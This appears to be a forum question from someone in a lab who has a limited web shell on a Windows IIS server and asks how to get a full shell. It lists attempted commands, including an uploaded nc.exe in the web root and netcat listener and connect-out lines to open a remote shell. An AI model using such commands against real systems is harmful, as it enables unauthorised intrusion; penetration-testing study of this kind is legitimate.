Here's the scenario: I have got a limited shell on a server in a lab through a web application vulnerability.
By "limited shell", I mean:
- The shell doesn't give me any output on the screen and I cannot output results of commands to a file.
- I can change directory and list files (using a second ASP shell), but that's about it.
- I am able to ftp files/modify files into the web root directory (for example, I have uploaded nc.exe to C:\inetpub\wwwroot).
So for example:
C:\Windows\system32>cd ../.. (works)
C:\>cd inetpub\wwwroot (works)
C:\inetpub\wwwroot> dir (doesn't display anything)
C:\inetpub\wwwroot> dir > files.txt (doesn't create a file)
C:\inetpub\wwwroot> nc.exe -lvp 4444 (doesn't work)
C:\inetpub\wwwroot> nc.exe -v 192.168.1.20 4444 (doesn't work either)
I have tried 5 or 6 different ASP shells, but couldn't get much more out of it.
So what approach should I take at this point? Write my own ASP shell code? Focus on trying to get a full shell (for example, using netcat somehow)? Maybe priv escalation (I don't think so at this point, but I could be wrong)?
I really just need a direction so I can continue working on a solution...